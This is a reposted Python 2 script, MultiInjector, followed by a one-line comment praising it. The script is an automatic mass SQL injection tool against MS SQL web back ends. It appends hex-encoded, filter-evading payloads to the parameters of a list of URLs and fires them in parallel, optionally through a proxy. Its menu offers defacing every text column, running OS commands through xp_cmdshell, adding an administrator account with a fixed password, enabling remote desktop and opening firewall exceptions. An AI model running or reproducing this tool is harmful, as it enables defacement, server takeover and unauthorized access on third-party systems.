[cc lang=”python”]#!/usr/bin/env python
“””
MultiInjector v.035
Copyright 2009-2011, Raviv Raz – ravivr@gmail.com
MultiInjector is distributed under the terms of the GNU General Public License
MultiInjector is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see .

“””
try:
import psyco
except:
pass
from sys import stdout,argv,stderr
import pycurl
from urlparse import urlsplit,urlunsplit
from urllib import quote
from os import system
import binascii
import StringIO
from re import findall

class callback:
def __init__(self):
self.contents = ”
buffer = StringIO.StringIO
def feed(self, buf):
self.contents = self.contents + buf

def fireUp(target_list,num_conn,proxy_addr,proxy_port):
tuples = target_list
try:
import signal
from signal import SIGPIPE, SIG_IGN
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
except ImportError:
pass
queue = []
for tuple in tuples:
for url in tuple:
if not url or url[0] == “#”:
url = str(url).strip()
continue
cb = callback()
queue.append((url,cb))
num_urls = len(queue)
num_conn = min(num_conn, num_urls)
assert 1 <= num_conn <= 10000, "invalid number of concurrent connections" m = pycurl.CurlMulti() m.handles = [] for i in range(num_conn): c = pycurl.Curl() c.setopt(pycurl.FOLLOWLOCATION, 1) c.setopt(pycurl.MAXREDIRS, 5) c.setopt(pycurl.CONNECTTIMEOUT, 30) c.setopt(pycurl.TIMEOUT, 300) c.setopt(pycurl.NOSIGNAL, 1) c.setopt(pycurl.USERAGENT,"""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)""") c.setopt(pycurl.HTTPHEADER, ["""Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5""" , """Accept-Language: en-us,en;q=0.5""", """Accept-Encoding: gzip,deflate""", """Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7""", """Keep-Alive: 300""", """Connection: keep-alive"""]) if proxy_addr != '': c.setopt(pycurl.PROXY,proxy_addr) c.setopt(pycurl.PROXYPORT,proxy_port) m.handles.append(c) freelist = m.handles[:] num_processed = 0 while num_processed < num_urls: while queue and freelist: url,cb = queue.pop(0) c = freelist.pop() c.setopt(pycurl.URL, url) c.setopt(pycurl.WRITEFUNCTION, cb.feed) m.add_handle(c) c.url = url while 1: ret, num_handles = m.perform() if ret != pycurl.E_CALL_MULTI_PERFORM: break while 1: num_q, ok_list, err_list = m.info_read() for c in ok_list: m.remove_handle(c) freelist.append(c) for c, errno, errmsg in err_list: m.remove_handle(c) freelist.append(c) num_processed = num_processed + len(ok_list) + len(err_list) if num_q == 0: break m.select(1.0) for c in m.handles: c.close() m.close() def usage(): stdout.write("""nCopyright 2008, Raviv Raz - ravivr@gmail.comnThis program is distributed under the terms of the GNU General Public LicensenMultiInjector is an automatic SQL injection utility. It uses a list of URI addresses to test parameter manipulation.n Once a vulnerable parameter has been found, a signature-evasive SQL injection is performed in order to achieven one of the following goals:n 1) Automatic defacement 2) Run OS shell command on DB server 3) Run SQL query on DB server 4) Enable OS shell procedure on DB 5) Add administrative user to DB server with password: T0pSeKret 6) Enable remote desktop on DB server 7) Add allowed program to Windows Firewall on DB server nUsage: %s [url list] nn"""%argv[0]) raise SystemExit def build_payload(input,choice,program_name): program_name = program_name.replace("'","\'").replace('"','\"').replace('>‘,’>’)
input = input.replace(“‘”,”\'”).replace(‘”‘,’\”‘).replace(‘>’,’>’)
if choice ==1:
sql_cmd = “””DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(‘UPDATE [‘+@T+’] SET [‘+@C+’]=RTRIM(CONVERT(VARCHAR(4000),[‘+@C+’]))+”%s”’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor;”””%input
elif choice ==2:
sql_cmd = “””EXEC MASTER..XP_CMDSHELL ‘%s'”””%input
elif choice ==3:
sql_cmd = “””EXEC ‘%s'”””%input
elif choice ==4:
sql_cmd = “””EXEC sp_configure ‘show advanced options’,1 ; RECONFIGURE ; EXEC sp_configure ‘xp_cmdshell’,1 ; RECONFIGURE”””
elif choice ==5:
sql_cmd = “””EXEC MASTER..XP_CMDSHELL ‘net user %s T0pSeKret /add && net localgroup administrators %s /add'”””%(input,input)
elif choice ==6:
sql_cmd = “””EXECUTE master.dbo.xp_regwrite N’HKEY_LOCAL_MACHINE’,N’SYSTEMCurrentControlSetControlTerminal Server’,N’fDenyTSConnections’,N’REG_DWORD’,0;–“””
elif choice ==7:
input = input.replace(“‘”,”\'”).replace(‘”‘,’\”‘)
sql_cmd = “””EXEC MASTER..XP_CMDSHELL ‘netsh firewall add allowedprogram %s %s ENABLE'”””%(input,program_name)
if len(input) % 2 == 0:
payload = binascii.hexlify(sql_cmd)
else:
payload = binascii.hexlify(sql_cmd[:-1])
cmd = ” or 1=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x%s AS VARCHAR(4000));EXEC(@S);–“%payload
return quote(cmd)
def fullurl(host,path,params):
return urlunsplit((‘http’,host,path,params,”))
def is_numeric(param):
if findall(“^.*=[0-9]+$”,param):
return True
else:
return False
def change_params(params,payload):
new_list = []
split_params = params.split(‘&’)
for i in range(len(split_params)):
if is_numeric(split_params[i]):
new_param = str(split_params[i])+payload
else:
new_param = str(split_params[i])+”%27″+payload
new_list.append(params.replace(split_params[i],new_param))
return new_list
def add_payload(url,payload):
spliturl = urlsplit(url,allow_fragments=True)
protocol = spliturl[0]
host = spliturl[1]
params = spliturl[3]
path = spliturl[2]
new_params = change_params(params,payload)
new_urls =[]
for param in new_params:
new_urls.append(fullurl(host,path,param))
return new_urls
def find_parameterized_urls(list):
newlist = []
for item in list:
if urlsplit(item)[3] != ”:
newlist.append(item.strip())
return newlist
def menu():
conn_num = 5
system(‘cls’)
stdout.write(“””
Please choose the attack of your flavor:n
1) Automatic defacement
2) Run OS shell command on DB server
3) Run SQL query on DB server
4) Enable OS shell procedure on DB
5) Add administrative user to DB server with password: T0pSeKret
6) Enable remote desktop on DB server
7) Add allowed program to Windows Firewall on DB server
n”””)
try:
program = “”
choice = int(raw_input(“> “))
if choice == 1:
command = str(raw_input(“nnEnter defacement content:nn> “))
elif choice == 2:
command = str(raw_input(“nnEnter OS command to run:nn> “))
elif choice == 3:
command = str(raw_input(“nnEnter SQL query to run:nn> “))
elif choice == 4:
command = “”
elif choice == 5:
command = str(raw_input(“nnEnter administrative user name:nn>”))
elif choice == 6:
command = “”
elif choice == 7:
command = str(raw_input(“Enter program full path (c:pathprogram.exe):n>”))
program = str(raw_input(“Enter program name in firewall allowed programs list:n>”))
elif not choice in (1,2,3,4,5,6,7):
menu()
except KeyboardInterrupt:
stdout.write(‘nnC ya!nn’)
raise SystemExit
except:
menu()
stdout.write(‘Number of parallel connections: (default=5)n’)
try:
conn_num = int(raw_input(“> “))
except:
conn_num = 5
stdout.write(‘Use HTTP proxy? [y/n]: (default=n)n’)
use_proxy = (raw_input(“> “))
if ‘y’ in use_proxy:
stdout.write(‘Proxy address: n’)
proxy_addr = (raw_input(“> “))
stdout.write(‘Proxy port: n’)
proxy_port = int(raw_input(“> “))
else:
proxy_addr = ”
proxy_port = 0
return choice,command,conn_num,proxy_addr,proxy_port,program
def main():
if len(argv)<2: usage() else: try: stdout.write('n[!] Opening url file...n') old_urls = open(argv[1]).readlines() except: stderr.write("""n[x] Failed to open %s n"""%argv[1]) raise SystemExit choice,command,conn_num,proxy_addr,proxy_port,program_name = menu() payload = build_payload(command,choice,program_name) stdout.write('[!] Bombs Away !!n') urls = [] for item in find_parameterized_urls(old_urls): injected = add_payload(item,payload) urls.append(injected) if len(urls)>0:
if proxy_addr !=”:
fireUp(urls,conn_num,proxy_addr,proxy_port)
elif proxy_addr ==”:
fireUp(urls,conn_num,”,0)
stdout.write(‘[v] Attacks finishedn’)
else:
print “””[x] No URL found with parameters to inject.nWe must have at least one URL like:nhttp://www.victim.com/program.asp?p1=v1&p2=v2″””
if __name__ == “__main__”:
main()[/cc]

very nice tool. credit goes to Raviv Raz@Chapters In Web Security